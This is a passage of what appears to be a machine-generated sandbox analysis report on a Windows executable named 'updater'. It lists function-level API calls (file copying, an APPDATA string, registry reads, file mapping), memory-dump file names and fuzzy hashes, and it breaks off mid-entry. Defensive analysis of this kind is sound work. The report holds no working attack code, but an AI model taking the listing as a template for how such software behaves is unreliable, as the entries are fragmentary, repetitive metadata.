                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Library$AddressFreeLoadProc
                                  • String ID: .$.$]]YA
                                  • API String ID: 145871493-2355798663
                                  • Opcode ID: 69a6da913a6e77c39027e7c17fb54f6fb24a38e5780ae3240851687bee80d745
                                  • Instruction ID: fb1129dbd145cffc9c56b8ccb4623a0db121ebf0b35faf355ff7173d88da0fe5
                                  • Opcode Fuzzy Hash: 69a6da913a6e77c39027e7c17fb54f6fb24a38e5780ae3240851687bee80d745
                                  • Instruction Fuzzy Hash: 7DD1DC72D0024ADFDF29EFE8E984BADBBB1BF15318F144099D055AB2A1CB705A45CB12
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50
                                    • Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
                                    • Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9
                                  • CopyFileA.KERNEL32 ref: 013CFDDF
                                    • Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
                                    • Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
                                    • Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                  • String ID: (\;$APPDATA$rtMO]Fr.
                                  • API String ID: 265086031-1862567354
                                  • Opcode ID: caa37040f5bc2ae169fd6ae904c385830f4c3060f395c15b6ac62977845a7377
                                  • Instruction ID: 7fe994dbfb65a276fc8027cd137f16409131bd14fdc2d441f3d59ac111eca68e
                                  • Opcode Fuzzy Hash: caa37040f5bc2ae169fd6ae904c385830f4c3060f395c15b6ac62977845a7377
                                  • Instruction Fuzzy Hash: 60D19931D04259DEDF14EBA8D890BEDBBB5AF25308F1440AED40A7B291DB701E89CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • _strlen.LIBCMT ref: 013D2B2C
                                  • _strlen.LIBCMT ref: 013D2B48
                                    • Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
                                    • Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9
                                    • Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
                                    • Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
                                    • Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave_strlen$ConditionVariableWake
                                  • String ID: ~\AJ[MZ`OCK.
                                  • API String ID: 2310394193-2575923559
                                  • Opcode ID: 7a24994672d4262f852681991c173fa9bd336bccc98b569ca5fd77c116d55b0e
                                  • Instruction ID: 6348c5c7cc4dae1f44636ef67658d3994a27a364e6e9c5f8055d1dd42df247b3
                                  • Opcode Fuzzy Hash: 7a24994672d4262f852681991c173fa9bd336bccc98b569ca5fd77c116d55b0e
                                  • Instruction Fuzzy Hash: EC412572D04286CFEF15EFB8E4447AEBBB4AF26218F14004EC0416B1A2DBB85946C793
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 014317B1: GetConsoleCP.KERNEL32 ref: 014317F9
                                  • WriteFile.KERNEL32(?,00000001,00000000,014602C0,00000000), ref: 0143216D
                                  • GetLastError.KERNEL32(?,00000000,00000001), ref: 01432177
                                  • __dosmaperr.LIBCMT ref: 014321BC
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                  • String ID:
                                  • API String ID: 251514795-0
                                  • Opcode ID: e6d3e4b52a0fe49e5756725ebd07d1b0066c54740dc2bba3df34864c7ae76cfb
                                  • Instruction ID: 60eef0bef86f78e66d3197542b3dea0bf2a2ecffa7ebaf05d438c3400b2de70d
                                  • Opcode Fuzzy Hash: e6d3e4b52a0fe49e5756725ebd07d1b0066c54740dc2bba3df34864c7ae76cfb
                                  • Instruction Fuzzy Hash: E451C175A0011AABEF11DFA9C984FEEBBB9BF9D314F040017D600A7271D6B49946CB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32 ref: 01438806
                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 01438874
                                    • Part of subcall function 0143749B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0143165F,?,00000000,00000000), ref: 0143753D
                                    • Part of subcall function 0143255C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0143838D,00000220,?,?,?,?,?,?,01423E8D,?), ref: 0143258E
                                  • _free.LIBCMT ref: 01438865
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                  • String ID:
                                  • API String ID: 2560199156-0
                                  • Opcode ID: 9533aa77d0a264df2424715c1191981ec803438ddf821de443a685580c47bfa5
                                  • Instruction ID: 5df6729d5defe341890a3579b7c97308e8edfd1163a2b5a5ff7484387b020d37
                                  • Opcode Fuzzy Hash: 9533aa77d0a264df2424715c1191981ec803438ddf821de443a685580c47bfa5
                                  • Instruction Fuzzy Hash: 860188A29012137F7735557B2C88C7BBD6DDEEED91314062ABA05D6224EB75CD0281B0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CloseHandle.KERNEL32(00000000), ref: 01431139
                                  • GetLastError.KERNEL32(?,01431011,?,01460260,0000000C,014310C3,?,?,?), ref: 01431143
                                  • __dosmaperr.LIBCMT ref: 0143116E
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseErrorHandleLast__dosmaperr
                                  • String ID:
                                  • API String ID: 2583163307-0
                                  • Opcode ID: 973702fd800de89096df7b79e1aa73d034972487bc5a8006f32e35df056ab32e
                                  • Instruction ID: 4480b5d8583cc1d479883eb5eb289e23e56550220c4026b16a1969bd5ff139d9
                                  • Opcode Fuzzy Hash: 973702fd800de89096df7b79e1aa73d034972487bc5a8006f32e35df056ab32e
                                  • Instruction Fuzzy Hash: 0601083270012016EE35223DE8497AFA76A4BEEF38F29055FE914973F2DF7088864290
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 013E3173
                                  • GetLastError.KERNEL32 ref: 013E317E
                                  • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 013E31A0
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$ErrorLastPointerRead
                                  • String ID:
                                  • API String ID: 64821003-0
                                  • Opcode ID: 4686fe8dccf0d59c453adf66701bfe98d44a1e53063f3eb2e2c04182452c6b81
                                  • Instruction ID: 39297113302bb6bdfe5244ddd93d6df5e35b4aad8aa435f7ab75c9c91e4d567a
                                  • Opcode Fuzzy Hash: 4686fe8dccf0d59c453adf66701bfe98d44a1e53063f3eb2e2c04182452c6b81
                                  • Instruction Fuzzy Hash: 6C015332300329FBDB219EA9DC49F9A3BFCEB053A5F504529FA15DB2D0D670D9408BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateFileMappingA.KERNEL32 ref: 013C777E
                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,05F5E100), ref: 013C779B
                                  • CloseHandle.KERNEL32(?), ref: 013C77AB
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleMappingView
                                  • String ID:
                                  • API String ID: 1187395538-0
                                  • Opcode ID: 9a3095dead2dce007d8c63f70aa3a12a13c38998413bfb3f376830242caca61f
                                  • Instruction ID: 22230842bb5cb0e74e09a15af4b556681ce60c00e2429d9d49532375707a0ffe
                                  • Opcode Fuzzy Hash: 9a3095dead2dce007d8c63f70aa3a12a13c38998413bfb3f376830242caca61f
                                  • Instruction Fuzzy Hash: 2C116974900F08DFD7338B1A8844E33BBECEB99F69B10855EE99681591D3709840CF10
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,?,003B5C28,?,013C84B6), ref: 013C795E
                                  • CloseHandle.KERNEL32(00000000), ref: 013C7971
                                  • CloseHandle.KERNEL32(00000000), ref: 013C798A
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle$FileUnmapView
                                  • String ID:
                                  • API String ID: 260491571-0
                                  • Opcode ID: 289adc08a288ed5021578e84c5815b1a115b2386675936b348c84054a4db29b6
                                  • Instruction ID: 0352618cc03cd50aa1681baaffc879e0dc7a863a8d8a38d5fc3753e2bf9054d7
                                  • Opcode Fuzzy Hash: 289adc08a288ed5021578e84c5815b1a115b2386675936b348c84054a4db29b6
                                  • Instruction Fuzzy Hash: DD011931001B408FE7329B79C44C7A2BBE0AB0571EF04C96DE1EA419A0C3B9A888CF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • EnterCriticalSection.KERNEL32(00000004,00000004,00000000,013C4737,?,?,?,?,?,013C46CC), ref: 013C46A1
                                  • GdiplusShutdown.GDIPLUS(00000000,?,?,?,?,?,013C46CC), ref: 013C46AE
                                  • LeaveCriticalSection.KERNEL32(00000004,?,?,?,?,?,013C46CC), ref: 013C46B8
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$EnterGdiplusLeaveShutdown
                                  • String ID:
                                  • API String ID: 3929762956-0
                                  • Opcode ID: 667a8a98afedc2052cf96ddd4647205b9b32c1e780354e6ba8a268134f44153c
                                  • Instruction ID: 0dcc423e902d67ba1b63a7720654cea70bb6b5fa4991bac3214ff9a3aa2dcfe9
                                  • Opcode Fuzzy Hash: 667a8a98afedc2052cf96ddd4647205b9b32c1e780354e6ba8a268134f44153c
                                  • Instruction Fuzzy Hash: D6D09E7E001110DBD7321F18F8087EA77F9EB85727F11491DF58191068D7B51897DB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetCPInfo.KERNEL32(E8458D00,?,?,?,00000000), ref: 01438201
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Info
                                  • String ID:
                                  • API String ID: 1807457897-3916222277
                                  • Opcode ID: d7b253201f9bc804d01d1093e052840774eead2347346aeb722ea56952f445c3
                                  • Instruction ID: f7abe8981d6e3bda71a3424d7b2081f6ff1ab7057f4e4c5b36d2f9b65562e76c
                                  • Opcode Fuzzy Hash: d7b253201f9bc804d01d1093e052840774eead2347346aeb722ea56952f445c3
                                  • Instruction Fuzzy Hash: 54416D705046499FD7218B58CD84FFBFBFDAB99304F1405AEF5CA87262D2719945CB20
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 0142FEA7
                                  Strings
                                  • InitializeCriticalSectionEx, xrefs: 0142FE77
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CountCriticalInitializeSectionSpin
                                  • String ID: InitializeCriticalSectionEx
                                  • API String ID: 2593887523-3084827643
                                  • Opcode ID: 4f217f92bf429433c01cbcedbac9287b8c1e7f5684a81005644afcd7bdf70602
                                  • Instruction ID: daa6e7c85eed3dd5fd2fe1d027f6a94c811897fb2c5077fff88d9a80f255c698
                                  • Opcode Fuzzy Hash: 4f217f92bf429433c01cbcedbac9287b8c1e7f5684a81005644afcd7bdf70602
                                  • Instruction Fuzzy Hash: 8BE09235581228BBDF222FD2DC05D9E3F26EB20BB1B404016FD0925130CB7249629BC0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Alloc
                                  • String ID: FlsAlloc
                                  • API String ID: 2773662609-671089009
                                  • Opcode ID: ebe08f52e5de83b3393d3afe2794d9e4c0855412b60212c43cdc8c17f3e7e23c
                                  • Instruction ID: fe375132e6200162875e4e340703efc755d45b578d538209bbd4e9fa28597322
                                  • Opcode Fuzzy Hash: ebe08f52e5de83b3393d3afe2794d9e4c0855412b60212c43cdc8c17f3e7e23c
                                  • Instruction Fuzzy Hash: 55E0C235A8123473E3213793AC06D5E7D16AB70AA2F954017FD08922348AB1094646D1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 014380F9: GetOEMCP.KERNEL32(00000000,0143836B,?,?,01423E8D,01423E8D,?), ref: 01438124
                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,014383B2,?,00000000,?,?,?,?,?,?,01423E8D), ref: 014385C2
                                  • GetCPInfo.KERNEL32(00000000,014383B2,?,?,014383B2,?,00000000,?,?,?,?,?,?,01423E8D,?), ref: 01438604
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CodeInfoPageValid
                                  • String ID:
                                  • API String ID: 546120528-0
                                  • Opcode ID: 0c03679118ef97331dc44351b43da3c6150106178cc3b685e7c2e672887a32a5
                                  • Instruction ID: 3998cf8114385706d0027a600578747c65c05081d94fb84a8196c0a686929089
                                  • Opcode Fuzzy Hash: 0c03679118ef97331dc44351b43da3c6150106178cc3b685e7c2e672887a32a5
                                  • Instruction Fuzzy Hash: 045125709002479FEB218F6AC8506BBFBF5EFD8204F14462FE18A87271D7749546CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 014380F9: GetOEMCP.KERNEL32(00000000,0143836B,?,?,01423E8D,01423E8D,?), ref: 01438124
                                  • _free.LIBCMT ref: 014383C8
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: dfe47748fc5b1cebd681ec4e32f9aeed3cbe3ac33f29815161c4a9a2523c44d5
                                  • Instruction ID: b8f4562ee589802fa224cc19af040d8318763125380e29df7008ead47ac8185b
                                  • Opcode Fuzzy Hash: dfe47748fc5b1cebd681ec4e32f9aeed3cbe3ac33f29815161c4a9a2523c44d5
                                  • Instruction Fuzzy Hash: EC31707190024AAFDB11DF69D840A9FBBB4AF98314F11426BF911973B1EB72D950CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 013E2F5C: GetVersionExA.KERNEL32(?), ref: 013E2F80
                                  • CreateFileW.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 013E366D
                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 013E3675
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile$Version
                                  • String ID:
                                  • API String ID: 1715692615-0
                                  • Opcode ID: 7628dd9b71ad52020161654a9a197ba3300cd69aea80264048e90bee5e5ccda1
                                  • Instruction ID: 610ab4c1e722bdcafef08e39da10608dc374bd1484d9791ca8378365fe3b0150
                                  • Opcode Fuzzy Hash: 7628dd9b71ad52020161654a9a197ba3300cd69aea80264048e90bee5e5ccda1
                                  • Instruction Fuzzy Hash: DF21F272A00325ABEB209F788C45BAE7BF4BF44228F144529E965EB3C0DB7488408B50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ___std_fs_directory_iterator_open@12.LIBCPMT ref: 013C2C5F
                                  • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 013C2C73
                                    • Part of subcall function 014060E6: FindNextFileW.KERNEL32(?,?,?,013C2C78,?,?,?,?,?,?,?,?,00000000), ref: 014060EF
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileFindNext___std_fs_directory_iterator_advance@8___std_fs_directory_iterator_open@12
                                  • String ID:
                                  • API String ID: 1204997319-0
                                  • Opcode ID: 025c1b87d7338fb4990cccebd282c0eb9b4c13ea38c8496a1ca4fd7cb7933e2a
                                  • Instruction ID: b56faad64e4c3c03b1ef3234d9fff514f15cd041c817c915b374052b81bc0223
                                  • Opcode Fuzzy Hash: 025c1b87d7338fb4990cccebd282c0eb9b4c13ea38c8496a1ca4fd7cb7933e2a
                                  • Instruction Fuzzy Hash: C121E471610616EBDF15AF98D980ADF77B4AF14B18F00841EEC02A7191D770DD809B50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?,?,?,00000000), ref: 013DBBCB
                                  • RegGetValueA.KERNEL32(?,00000000,?,00000002,00000000,00000000,00000100,?,?,00000000,00020019,?,?,?,00000000), ref: 013DBBF1
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: OpenValue
                                  • String ID:
                                  • API String ID: 3130442925-0
                                  • Opcode ID: a4114137676e494545ba4f8b5eb979bdd9c807181b455980f06885c00714c631
